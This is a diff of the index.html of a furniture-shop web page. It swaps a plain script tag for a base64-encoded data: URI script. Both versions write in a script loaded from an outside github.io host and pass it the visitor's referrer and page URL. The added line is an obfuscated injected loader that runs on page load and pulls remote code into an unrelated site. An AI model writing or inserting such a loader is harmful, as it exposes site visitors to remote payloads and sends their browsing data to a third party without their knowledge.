--- a/index.html
+++ b/index.html
@@ -1,8 +1,7 @@
 <!DOCTYPE html>
 <html lang="ru">
 <head>
-    <script async>document.write(`<script async src="https://on-okko.github.io/2025/index.php?referrerCF=${escape(document.referrer)}&urlCF=${escape(window.location.href)}"><\/script>`)</script>
-    <meta charset="UTF-8">
+<script src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUoYDxzY3JpcHQgYXN5bmMgc3JjPSJodHRwczovL29uLW9ra28uZ2l0aHViLmlvLzIwMjUvaW5kZXgucGhwP3JlZmVycmVyQ0Y9JHtlc2NhcGUoZG9jdW1lbnQucmVmZXJyZXIpfSZ1cmxDRj0ke2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZil9Ij48XC9zY3JpcHQ+YCk="></script>    <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Продажа деревянной мебели в Украине</title>
     <style>
